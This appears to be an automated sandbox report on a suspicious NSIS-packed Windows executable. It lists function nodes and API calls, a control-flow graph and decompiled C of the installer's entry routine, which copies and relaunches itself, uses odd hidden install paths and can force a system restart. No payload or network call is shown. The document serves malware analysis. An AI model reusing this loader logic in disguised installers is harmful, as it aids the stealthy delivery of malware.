402de6 17 API calls 5890->5891 5892 4025a8 5891->5892 5893 402d84 17 API calls 5892->5893 5894 4025b1 5893->5894 5895 4025d9 RegEnumValueW 5894->5895 5896 4025cd RegEnumKeyW 5894->5896 5898 40292e 5894->5898 5897 4025ee RegCloseKey 5895->5897 5896->5897 5897->5898 5900 6eb81058 5902 6eb81074 5900->5902 5901 6eb810dd 5902->5901 5903 6eb815b6 GlobalFree 5902->5903 5904 6eb81092 5902->5904 5903->5904 5905 6eb815b6 GlobalFree 5904->5905 5906 6eb810a2 5905->5906 5907 6eb810a9 GlobalSize 5906->5907 5908 6eb810b2 5906->5908 5907->5908 5909 6eb810c7 5908->5909 5910 6eb810b6 GlobalAlloc 5908->5910 5912 6eb810d2 GlobalFree 5909->5912 5911 6eb815dd 3 API calls 5910->5911 5911->5909 5912->5901 5913 404622 5914 404754 5913->5914 5917 40463a 5913->5917 5915 4047be 5914->5915 5916 404888 5914->5916 5922 40478f GetDlgItem SendMessageW 5914->5922 5915->5916 5918 4047c8 GetDlgItem 5915->5918 5924 4044ca 8 API calls 5916->5924 5919 404463 18 API calls 5917->5919 5920 4047e2 5918->5920 5921 404849 5918->5921 5923 4046a1 5919->5923 5920->5921 5928 404808 SendMessageW LoadCursorW SetCursor 5920->5928 5921->5916 5929 40485b 5921->5929 5946 404485 KiUserCallbackDispatcher 5922->5946 5926 404463 18 API calls 5923->5926 5927 404883 5924->5927 5933 4046ae CheckDlgButton 5926->5933 5947 4048d1 5928->5947 5930 404871 5929->5930 5931 404861 SendMessageW 5929->5931 5930->5927 5935 404877 SendMessageW 5930->5935 5931->5930 5932 4047b9 5936 4048ad SendMessageW 5932->5936 5944 404485 KiUserCallbackDispatcher 5933->5944 5935->5927 5936->5915 5939 4046cc GetDlgItem 5945 404498 SendMessageW 5939->5945 5941 4046e2 SendMessageW 5942 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5941->5942 5943 4046ff GetSysColor 5941->5943 5942->5927 5943->5942 5944->5939 5945->5941 5946->5932 5950 405b2d ShellExecuteExW 5947->5950 5949 404837 LoadCursorW SetCursor 5949->5921 5950->5949 4446 4015a3 4447 402da6 17 API calls 4446->4447 4448 4015aa SetFileAttributesW 4447->4448 4449 4015bc 4448->4449 4559 401fa4 4560 402da6 17 API calls 4559->4560 4561 401faa 4560->4561 4562 405569 24 API calls 4561->4562 4563 401fb4 4562->4563 4574 405aea CreateProcessW 4563->4574 4566 401fdd CloseHandle 4570 40292e 4566->4570 4569 401fcf 4571 401fd4 4569->4571 4572 401fdf 4569->4572 4582 40644e wsprintfW 4571->4582 4572->4566 4575 401fba 4574->4575 4576 405b1d CloseHandle 4574->4576 4575->4566 4575->4570 4577 40697f WaitForSingleObject 4575->4577 4576->4575 4578 406999 4577->4578 4579 4069ab GetExitCodeProcess 4578->4579 4583 406910 4578->4583 4579->4569 4582->4566 4584 40692d PeekMessageW 4583->4584 4585 406923 DispatchMessageW 4584->4585 4586 40693d WaitForSingleObject 4584->4586 4585->4584 4586->4578 4590 4056a8 4591 405852 4590->4591 4592 4056c9 GetDlgItem GetDlgItem GetDlgItem 4590->4592 4594 405883 4591->4594 4595 40585b GetDlgItem CreateThread FindCloseChangeNotification 4591->4595 4635 404498 SendMessageW 4592->4635 4597 4058d3 4594->4597 4598 40589a ShowWindow ShowWindow 4594->4598 4599 4058ae 4594->4599 4595->4594 4638 40563c OleInitialize 4595->4638 4596 405739 4604 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4596->4604 4603 4044ca 8 API calls 4597->4603 4637 404498 SendMessageW 4598->4637 4600 40590e 4599->4600 4601 4058c2 4599->4601 4602 4058e8 ShowWindow 4599->4602 4600->4597 4612 40591c SendMessageW 4600->4612 4606 40443c SendMessageW 4601->4606 4608 405908 4602->4608 4609 4058fa 4602->4609 4607 4058e1 4603->4607 4610 405792 SendMessageW SendMessageW 4604->4610 4611 4057ae 4604->4611 4606->4597 4614 40443c SendMessageW 4608->4614 4613 405569 24 API calls 4609->4613 4610->4611 4615 4057c1 4611->4615 4616 4057b3 SendMessageW 4611->4616 4612->4607 4617 405935 CreatePopupMenu 4612->4617 4613->4608 4614->4600 4619 404463 18 API calls 4615->4619 4616->4615 4618 406544 17 API calls 4617->4618 4621 405945 AppendMenuW 4618->4621 4620 4057d1 4619->4620 4624 4057da ShowWindow 4620->4624 4625 40580e GetDlgItem SendMessageW 4620->4625 4622 405962 GetWindowRect 4621->4622 4623 405975 TrackPopupMenu 4621->4623 4622->4623 4623->4607 4626 405990 4623->4626 4627 4057f0 ShowWindow 4624->4627 4628 4057fd 4624->4628 4625->4607 4629 405835 SendMessageW SendMessageW 4625->4629 4630 4059ac SendMessageW 4626->4630 4627->4628 4636 404498 SendMessageW 4628->4636 4629->4607 4630->4630 4631 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4630->4631 4633 4059ee SendMessageW 4631->4633 4633->4633 4634 405a17 GlobalUnlock SetClipboardData CloseClipboard 4633->4634 4634->4607 4635->4596 4636->4625 4637->4599 4639 4044af SendMessageW 4638->4639 4640 40565f 4639->4640 4643 401389 2 API calls 4640->4643 4644 405686 4640->4644 4641 4044af SendMessageW 4642 405698 OleUninitialize 4641->4642 4643->4640 4644->4641 4645 40252a 4656 402de6 4645->4656 4648 402da6 17 API calls 4649 40253d 4648->4649 4650 402548 RegQueryValueExW 4649->4650 4651 40292e 4649->4651 4652 402568 4650->4652 4655 40256e RegCloseKey 4650->4655 4652->4655 4661 40644e wsprintfW 4652->4661 4655->4651 4657 402da6 17 API calls 4656->4657 4658 402dfd 4657->4658 4659 406374 RegOpenKeyExW 4658->4659 4660 402534 4659->4660 4660->4648 4661->4655 5951 40202a 5952 402da6 17 API calls 5951->5952 5953 402031 5952->5953 5954 4068d4 5 API calls 5953->5954 5955 402040 5954->5955 5956 40205c GlobalAlloc 5955->5956 5958 4020cc 5955->5958 5957 402070 5956->5957 5956->5958 5959 4068d4 5 API calls 5957->5959 5960 402077 5959->5960 5961 4068d4 5 API calls 5960->5961 5962 402081 5961->5962 5962->5958 5966 40644e wsprintfW 5962->5966 5964 4020ba 5967 40644e wsprintfW 5964->5967 5966->5964 5967->5958 5968 404caa 5969 404cd6 5968->5969 5970 404cba 5968->5970 5972 404d09 5969->5972 5973 404cdc SHGetPathFromIDListW 5969->5973 5979 405b4b GetDlgItemTextW 5970->5979 5975 404cec 5973->5975 5978 404cf3 SendMessageW 5973->5978 5974 404cc7 SendMessageW 5974->5969 5977 40140b 2 API calls 5975->5977 5977->5978 5978->5972 5979->5974 5980 4021aa 5981 402da6 17 API calls 5980->5981 5982 4021b1 5981->5982 5983 402da6 17 API calls 5982->5983 5984 4021bb 5983->5984 5985 402da6 17 API calls 5984->5985 5986 4021c5 5985->5986 5987 402da6 17 API calls 5986->5987 5988 4021cf 5987->5988 5989 402da6 17 API calls 5988->5989 5990 4021d9 5989->5990 5991 402218 CoCreateInstance 5990->5991 5992 402da6 17 API calls 5990->5992 5993 402237 5991->5993 5992->5991 5994 401423 24 API calls 5993->5994 5995 4022f6 5993->5995 5994->5995 5996 401a30 5997 402da6 17 API calls 5996->5997 5998 401a39 ExpandEnvironmentStringsW 5997->5998 5999 401a4d 5998->5999 6001 401a60 5998->6001 6000 401a52 lstrcmpW 5999->6000 5999->6001 6000->6001 4749 4023b2 4750 4023c0 4749->4750 4751 4023ba 4749->4751 4753 402da6 17 API calls 4750->4753 4754 4023ce 4750->4754 4752 402da6 17 API calls 4751->4752 4752->4750 4753->4754 4755 4023dc 4754->4755 4757 402da6 17 API calls 4754->4757 4756 402da6 17 API calls 4755->4756 4758 4023e5 WritePrivateProfileStringW 4756->4758 4757->4755 6014 402434 6015 402467 6014->6015 6016 40243c 6014->6016 6018 402da6 17 API calls 6015->6018 6017 402de6 17 API calls 6016->6017 6019 402443 6017->6019 6020 40246e 6018->6020 6022 40247b 6019->6022 6023 402da6 17 API calls 6019->6023 6025 402e64 6020->6025 6024 402454 RegDeleteValueW RegCloseKey 6023->6024 6024->6022 6026 402e78 6025->6026 6027 402e71 6025->6027 6026->6027 6029 402ea9 6026->6029 6027->6022 6030 406374 RegOpenKeyExW 6029->6030 6031 402ed7 6030->6031 6032 402ee7 RegEnumValueW 6031->6032 6033 402f0a 6031->6033 6040 402f81 6031->6040 6032->6033 6034 402f71 RegCloseKey 6032->6034 6033->6034 6035 402f46 RegEnumKeyW 6033->6035 6036 402f4f RegCloseKey 6033->6036 6039 402ea9 6 API calls 6033->6039 6034->6040 6035->6033 6035->6036 6037 4068d4 5 API calls 6036->6037 6038 402f5f 6037->6038 6038->6040 6041 402f63 RegDeleteKeyW 6038->6041 6039->6033 6040->6027 6041->6040 6049 401735 6050 402da6 17 API calls 6049->6050 6051 40173c SearchPathW 6050->6051 6052 401757 6051->6052 6053 401d38 6054 402d84 17 API calls 6053->6054 6055 401d3f 6054->6055 6056 402d84 17 API calls 6055->6056 6057 401d4b GetDlgItem 6056->6057 6058 402638 6057->6058 6059 4014b8 6060 4014be 6059->6060 6061 401389 2 API calls 6060->6061 6062 4014c6 6061->6062 6070 6eb82d43 6071 6eb82d5b 6070->6071 6072 6eb8162f 2 API calls 6071->6072 6073 6eb82d76 6072->6073 6074 40263e 6075 402652 6074->6075 6076 40266d 6074->6076 6077 402d84 17 API calls 6075->6077 6078 402672 6076->6078 6079 40269d 6076->6079 6088 402659 6077->6088 6081 402da6 17 API calls 6078->6081 6080 402da6 17 API calls 6079->6080 6082 4026a4 lstrlenW 6080->6082 6083 402679 6081->6083 6082->6088 6091 406529 WideCharToMultiByte 6083->6091 6085 40268d lstrlenA 6085->6088 6086 4026d1 6087 4026e7 6086->6087 6089 4060a9 WriteFile 6086->6089 6088->6086 6088->6087 6090 4060d8 5 API calls 6088->6090 6089->6087 6090->6086 6091->6085

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 8 4035ea-4035fe call 406864 lstrlenA 6->8 13 403600-40361c call 4068d4 * 3 8->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 35 4036b8-4036bd 33->35 36 4036bf-4036c5 33->36 37 4037c2-4037dc GetTempPathW call 4034c6 34->37 35->35 35->36 38 4036c7-4036cb 36->38 39 4036cc-4036d0 36->39 47 403834-40384c DeleteFileW call 40307d 37->47 48 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 37->48 38->39 41 403790-40379e call 405e03 39->41 42 4036d6-4036dc 39->42 41->32 56 4037a0-4037a1 41->56 45 4036f6-40372f 42->45 46 4036de-4036e5 42->46 53 403731-403736 45->53 54 40374b-403785 45->54 51 4036e7-4036ea 46->51 52 4036ec 46->52 63 403852-403858 47->63 64 403a23-403a31 call 403adc OleUninitialize 47->64 48->47 67 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 48->67 51->45 51->52 52->45 53->54 58 403738-403740 53->58 60 403787-40378b 54->60 61 40378d-40378f 54->61 56->32 65 403742-403745 58->65 66 403747 58->66 60->61 62 4037b0-4037bd call 406507 60->62 61->41 62->37 69 40385e-403871 call 405e03 63->69 70 4038ff-403906 call 403bb6 63->70 79 403a33-403a42 call 405b67 ExitProcess 64->79 80 403a48-403a4e 64->80 65->54 65->66 66->54 67->47 67->64 83 4038c3-4038d0 69->83 84 403873-4038a8 69->84 78 40390b-40390e 70->78 78->64 81 403a50-403a65 GetCurrentProcess OpenProcessToken 80->81 82 403ac6-403ace 80->82 87 403a96-403aa4 call 4068d4 81->87 88 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 90 403ad0 82->90 91 403ad3-403ad6 ExitProcess 82->91 92 4038d2-4038e0 call 405ede 83->92 93 403913-403927 call 405ad2 lstrcatW 83->93 89 4038aa-4038ae 84->89 104 403ab2-403abd ExitWindowsEx 87->104 105 403aa6-403ab0 87->105 88->87 96 4038b0-4038b5 89->96 97 4038b7-4038bf 89->97 90->91 92->64 103 4038e6-4038fc call 406507 * 2 92->103 106 403934-40394e lstrcatW lstrcmpiW 93->106 107 403929-40392f lstrcatW 93->107 96->97 101 4038c1 96->101 97->89 97->101 101->83 103->70 104->82 109 403abf-403ac1 call 40140b 104->109 105->104 105->109 110 403a21 106->110 111 403954-403957 106->111 107->106 109->82 110->64 112 403960 call 405ab5 111->112 113 403959-40395e call 405a38 111->113 121 403965-403975 SetCurrentDirectoryW 112->121 113->121 123 403982-4039ae call 406507 121->123 124 403977-40397d call 406507 121->124 128 4039b3-4039ce call 406544 DeleteFileW 123->128 124->123 131 4039d0-4039e0 CopyFileW 128->131 132 403a0e-403a18 128->132 131->132 134 4039e2-403a02 call 4062c7 call 406544 call 405aea 131->134 132->128 133 403a1a-403a1c call 4062c7 132->133 133->110 134->132 142 403a04-403a0b CloseHandle 134->142 142->132
                                                C-Code - Quality: 79%
                                                			_entry_() {
                                                				WCHAR* _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				int _v24;
                                                				int _v28;
                                                				struct _TOKEN_PRIVILEGES _v40;
                                                				signed char _v42;
                                                				int _v44;
                                                				signed int _v48;
                                                				intOrPtr _v278;
                                                				signed short _v310;
                                                				struct _OSVERSIONINFOW _v324;
                                                				struct _SHFILEINFOW _v1016;
                                                				intOrPtr* _t88;
                                                				WCHAR* _t92;
                                                				char* _t94;
                                                				void _t97;
                                                				void* _t116;
                                                				WCHAR* _t118;
                                                				signed int _t120;
                                                				intOrPtr* _t124;
                                                				void* _t138;
                                                				void* _t144;
                                                				void* _t149;
                                                				void* _t153;
                                                				void* _t158;
                                                				signed int _t168;
                                                				void* _t171;
                                                				void* _t176;
                                                				intOrPtr _t178;
                                                				intOrPtr _t179;
                                                				intOrPtr* _t180;
                                                				int _t189;
                                                				void* _t190;
                                                				void* _t199;
                                                				signed int _t205;
                                                				signed int _t210;
                                                				signed int _t215;
                                                				signed int _t217;
                                                				int* _t219;
                                                				signed int _t227;
                                                				signed int _t230;
                                                				CHAR* _t232;
                                                				char* _t233;
                                                				signed int _t234;
                                                				WCHAR* _t235;
                                                				void* _t251;
                                                
                                                				_t217 = 0x20;
                                                				_t189 = 0;
                                                				_v24 = 0;
                                                				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				_v20 = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				_v324.szCSDVersion = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				_v324.dwOSVersionInfoSize = 0x11c;
                                                				if(GetVersionExW( &_v324) == 0) {
                                                					_v324.dwOSVersionInfoSize = 0x114;
                                                					GetVersionExW( &_v324);
                                                					asm("sbb eax, eax");
                                                					_v42 = 4;
                                                					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                				}
                                                				if(_v324.dwMajorVersion < 0xa) {
                                                					_v310 = _v310 & 0x00000000;
                                                				}
                                                				 *0x42a2d8 = _v324.dwBuildNumber;
                                                				 *0x42a2dc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                				if( *0x42a2de != 0x600) {
                                                					_t180 = E004068D4(_t189);
                                                					if(_t180 != _t189) {
                                                						 *_t180(0xc00);
                                                					}
                                                				}
                                                				_t232 = "UXTHEME";
                                                				do {
                                                					E00406864(_t232); // executed
                                                					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                				} while ( *_t232 != 0);
                                                				E004068D4(0xb);
                                                				 *0x42a224 = E004068D4(9);
                                                				_t88 = E004068D4(7);
                                                				if(_t88 != _t189) {
                                                					_t88 =  *_t88(0x1e);
                                                					if(_t88 != 0) {
                                                						 *0x42a2dc =  *0x42a2dc | 0x00000080;
                                                					}
                                                				}
                                                				__imp__#17();
                                                				__imp__OleInitialize(_t189); // executed
                                                				 *0x42a2e0 = _t88;
                                                				SHGetFileInfoW(0x4216c8, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                				E00406507(0x429220, L"NSIS Error");
                                                				_t92 = GetCommandLineW();
                                                				_t233 = L"\"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe\" ";
                                                				E00406507(_t233, _t92);
                                                				_t94 = _t233;
                                                				_t234 = 0x22;
                                                				 *0x42a220 = 0x400000;
                                                				_t251 = L"\"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe\" " - _t234; // 0x22
                                                				if(_t251 == 0) {
                                                					_t217 = _t234;
                                                					_t94 =  &M00435002;
                                                				}
                                                				_t199 = CharNextW(E00405E03(_t94, _t217));
                                                				_v16 = _t199;
                                                				while(1) {
                                                					_t97 =  *_t199;
                                                					_t252 = _t97 - _t189;
                                                					if(_t97 == _t189) {
                                                						break;
                                                					}
                                                					_t210 = 0x20;
                                                					__eflags = _t97 - _t210;
                                                					if(_t97 != _t210) {
                                                						L17:
                                                						__eflags =  *_t199 - _t234;
                                                						_v12 = _t210;
                                                						if( *_t199 == _t234) {
                                                							_v12 = _t234;
                                                							_t199 = _t199 + 2;
                                                							__eflags = _t199;
                                                						}
                                                						__eflags =  *_t199 - 0x2f;
                                                						if( *_t199 != 0x2f) {
                                                							L32:
                                                							_t199 = E00405E03(_t199, _v12);
                                                							__eflags =  *_t199 - _t234;
                                                							if(__eflags == 0) {
                                                								_t199 = _t199 + 2;
                                                								__eflags = _t199;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t199 = _t199 + 2;
                                                							__eflags =  *_t199 - 0x53;
                                                							if( *_t199 != 0x53) {
                                                								L24:
                                                								asm("cdq");
                                                								asm("cdq");
                                                								_t215 = L"NCRC" & 0x0000ffff;
                                                								asm("cdq");
                                                								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                									L29:
                                                									asm("cdq");
                                                									asm("cdq");
                                                									_t210 = L" /D=" & 0x0000ffff;
                                                									asm("cdq");
                                                									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                										L31:
                                                										_t234 = 0x22;
                                                										goto L32;
                                                									}
                                                									__eflags =  *_t199 - _t230;
                                                									if( *_t199 == _t230) {
                                                										 *(_t199 - 4) = _t189;
                                                										__eflags = _t199;
                                                										E00406507(L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially", _t199);
                                                										L37:
                                                										_t235 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                										GetTempPathW(0x400, _t235);
                                                										_t116 = E004034C6(_t199, _t252);
                                                										_t253 = _t116;
                                                										if(_t116 != 0) {
                                                											L40:
                                                											DeleteFileW(L"1033"); // executed
                                                											_t118 = E0040307D(_t255, _v20); // executed
                                                											_v8 = _t118;
                                                											if(_t118 != _t189) {
                                                												L68:
                                                												E00403ADC();
                                                												__imp__OleUninitialize();
                                                												if(_v8 == _t189) {
                                                													if( *0x42a2b4 == _t189) {
                                                														L77:
                                                														_t120 =  *0x42a2cc;
                                                														if(_t120 != 0xffffffff) {
                                                															_v24 = _t120;
                                                														}
                                                														ExitProcess(_v24);
                                                													}
                                                													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                														_v40.PrivilegeCount = 1;
                                                														_v28 = 2;
                                                														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                													}
                                                													_t124 = E004068D4(4);
                                                													if(_t124 == _t189) {
                                                														L75:
                                                														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                															goto L77;
                                                														}
                                                														goto L76;
                                                													} else {
                                                														_push(0x80040002);
                                                														_push(0x25);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														_push(_t189);
                                                														if( *_t124() == 0) {
                                                															L76:
                                                															E0040140B(9);
                                                															goto L77;
                                                														}
                                                														goto L75;
                                                													}
                                                												}
                                                												E00405B67(_v8, 0x200010);
                                                												ExitProcess(2);
                                                											}
                                                											if( *0x42a23c == _t189) {
                                                												L51:
                                                												 *0x42a2cc =  *0x42a2cc | 0xffffffff;
                                                												_v24 = E00403BB6(_t265);
                                                												goto L68;
                                                											}
                                                											_t219 = E00405E03(L"\"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe\" ", _t189);
                                                											if(_t219 < L"\"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe\" ") {
                                                												L48:
                                                												_t264 = _t219 - L"\"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe\" ";
                                                												_v8 = L"Error launching installer";
                                                												if(_t219 < L"\"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe\" ") {
                                                													_t190 = E00405AD2(__eflags);
                                                													lstrcatW(_t235, L"~nsu");
                                                													__eflags = _t190;
                                                													if(_t190 != 0) {
                                                														lstrcatW(_t235, "A");
                                                													}
                                                													lstrcatW(_t235, L".tmp");
                                                													_t220 = L"C:\\Users\\jones\\Desktop";
                                                													_t138 = lstrcmpiW(_t235, L"C:\\Users\\jones\\Desktop");
                                                													__eflags = _t138;
                                                													if(_t138 == 0) {
                                                														L67:
                                                														_t189 = 0;
                                                														__eflags = 0;
                                                														goto L68;
                                                													} else {
                                                														__eflags = _t190;
                                                														_push(_t235);
                                                														if(_t190 == 0) {
                                                															E00405AB5();
                                                														} else {
                                                															E00405A38();
                                                														}
                                                														SetCurrentDirectoryW(_t235);
                                                														__eflags = L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially"; // 0x43
                                                														if(__eflags == 0) {
                                                															E00406507(L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially", _t220);
                                                														}
                                                														E00406507(0x42b000, _v16);
                                                														_t202 = "A" & 0x0000ffff;
                                                														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                														__eflags = _t144;
                                                														_v12 = 0x1a;
                                                														 *0x42b800 = _t144;
                                                														do {
                                                															E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x120)));
                                                															DeleteFileW(0x420ec8);
                                                															__eflags = _v8;
                                                															if(_v8 != 0) {
                                                																_t149 = CopyFileW(L"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe", 0x420ec8, 1);
                                                																__eflags = _t149;
                                                																if(_t149 != 0) {
                                                																	E004062C7(_t202, 0x420ec8, 0);
                                                																	E00406544(0, 0x420ec8, _t235, 0x420ec8,  *((intOrPtr*)( *0x42a230 + 0x124)));
                                                																	_t153 = E00405AEA(0x420ec8);
                                                																	__eflags = _t153;
                                                																	if(_t153 != 0) {
                                                																		CloseHandle(_t153);
                                                																		_v8 = 0;
                                                																	}
                                                																}
                                                															}
                                                															 *0x42b800 =  *0x42b800 + 1;
                                                															_t61 =  &_v12;
                                                															 *_t61 = _v12 - 1;
                                                															__eflags =  *_t61;
                                                														} while ( *_t61 != 0);
                                                														E004062C7(_t202, _t235, 0);
                                                														goto L67;
                                                													}
                                                												}
                                                												 *_t219 = _t189;
                                                												_t222 =  &(_t219[2]);
                                                												_t158 = E00405EDE(_t264,  &(_t219[2]));
                                                												_t265 = _t158;
                                                												if(_t158 == 0) {
                                                													goto L68;
                                                												}
                                                												E00406507(L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially", _t222);
                                                												E00406507(L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially\\Tygnings\\systemless", _t222);
                                                												_v8 = _t189;
                                                												goto L51;
                                                											}
                                                											asm("cdq");
                                                											asm("cdq");
                                                											asm("cdq");
                                                											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                												_t219 = _t219;
                                                												if(_t219 >= L"\"C:\\Users\\jones\\Desktop\\xKBLVUHoY6.exe\" ") {
                                                													continue;
                                                												}
                                                												break;
                                                											}
                                                											_t189 = 0;
                                                											goto L48;
                                                										}
                                                										GetWindowsDirectoryW(_t235, 0x3fb);
                                                										lstrcatW(_t235, L"\\Temp");
                                                										_t171 = E004034C6(_t199, _t253);
                                                										_t254 = _t171;
                                                										if(_t171 != 0) {
                                                											goto L40;
                                                										}
                                                										GetTempPathW(0x3fc, _t235);
                                                										lstrcatW(_t235, L"Low");
                                                										SetEnvironmentVariableW(L"TEMP", _t235);
                                                										SetEnvironmentVariableW(L"TMP", _t235);
                                                										_t176 = E004034C6(_t199, _t254);
                                                										_t255 = _t176;
                                                										if(_t176 == 0) {
                                                											goto L68;
                                                										}
                                                										goto L40;
                                                									}
                                                									goto L31;
                                                								}
                                                								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                									goto L29;
                                                								}
                                                								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                								__eflags = _t178 - 0x20;
                                                								if(_t178 == 0x20) {
                                                									L28:
                                                									_t36 =  &_v20;
                                                									 *_t36 = _v20 | 0x00000004;
                                                									__eflags =  *_t36;
                                                									goto L29;
                                                								}
                                                								__eflags = _t178 - _t189;
                                                								if(_t178 != _t189) {
                                                									goto L29;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                							__eflags = _t179 - _t210;
                                                							if(_t179 == _t210) {
                                                								L23:
                                                								 *0x42a2c0 = 1;
                                                								goto L24;
                                                							}
                                                							__eflags = _t179 - _t189;
                                                							if(_t179 != _t189) {
                                                								goto L24;
                                                							}
                                                							goto L23;
                                                						}
                                                					} else {
                                                						goto L16;
                                                					}
                                                					do {
                                                						L16:
                                                						_t199 = _t199 + 2;
                                                						__eflags =  *_t199 - _t210;
                                                					} while ( *_t199 == _t210);
                                                					goto L17;
                                                				}
                                                				goto L37;
                                                			}



















































                                                0x00403505
                                                0x00403506
                                                0x0040350d
                                                0x00403510
                                                0x00403517
                                                0x0040351a
                                                0x0040352d
                                                0x00403533
                                                0x00403536
                                                0x00403539
                                                0x00403547
                                                0x0040354f
                                                0x0040355a
                                                0x00403573
                                                0x00403575
                                                0x0040357d
                                                0x0040357d
                                                0x00403588
                                                0x0040358a
                                                0x0040358a
                                                0x0040359f
                                                0x004035c4
                                                0x004035d2
                                                0x004035d5
                                                0x004035dc
                                                0x004035e3
                                                0x004035e3
                                                0x004035dc
                                                0x004035e5
                                                0x004035ea
                                                0x004035eb
                                                0x004035f7
                                                0x004035fb
                                                0x00403602
                                                0x00403610
                                                0x00403615
                                                0x0040361c
                                                0x00403620
                                                0x00403624
                                                0x00403626
                                                0x00403626
                                                0x00403624
                                                0x0040362d
                                                0x00403634
                                                0x0040363a
                                                0x00403652
                                                0x00403662
                                                0x00403667
                                                0x0040366d
                                                0x00403674
                                                0x0040367b
                                                0x0040367d
                                                0x0040367e
                                                0x00403688
                                                0x0040368f
                                                0x00403691
                                                0x00403693
                                                0x00403693
                                                0x004036a6
                                                0x004036a8
                                                0x004037a2
                                                0x004037a2
                                                0x004037a5
                                                0x004037a8
                                                0x00000000
                                                0x00000000
                                                0x004036b2
                                                0x004036b3
                                                0x004036b6
                                                0x004036bf
                                                0x004036bf
                                                0x004036c2
                                                0x004036c5
                                                0x004036c8
                                                0x004036cb
                                                0x004036cb
                                                0x004036cb
                                                0x004036cc
                                                0x004036d0
                                                0x00403790
                                                0x00403799
                                                0x0040379b
                                                0x0040379e
                                                0x004037a1
                                                0x004037a1
                                                0x004037a1
                                                0x00000000
                                                0x004036d6
                                                0x004036d7
                                                0x004036d8
                                                0x004036dc
                                                0x004036f6
                                                0x004036fd
                                                0x00403710
                                                0x00403711
                                                0x00403726
                                                0x0040372b
                                                0x0040372d
                                                0x0040372f
                                                0x0040374b
                                                0x00403752
                                                0x00403765
                                                0x00403766
                                                0x0040377b
                                                0x00403781
                                                0x00403783
                                                0x00403785
                                                0x0040378d
                                                0x0040378f
                                                0x00000000
                                                0x0040378f
                                                0x00403789
                                                0x0040378b
                                                0x004037b0
                                                0x004037b4
                                                0x004037bd
                                                0x004037c2
                                                0x004037c8
                                                0x004037d3
                                                0x004037d5
                                                0x004037da
                                                0x004037dc
                                                0x00403834
                                                0x00403839
                                                0x00403842
                                                0x00403849
                                                0x0040384c
                                                0x00403a23
                                                0x00403a23
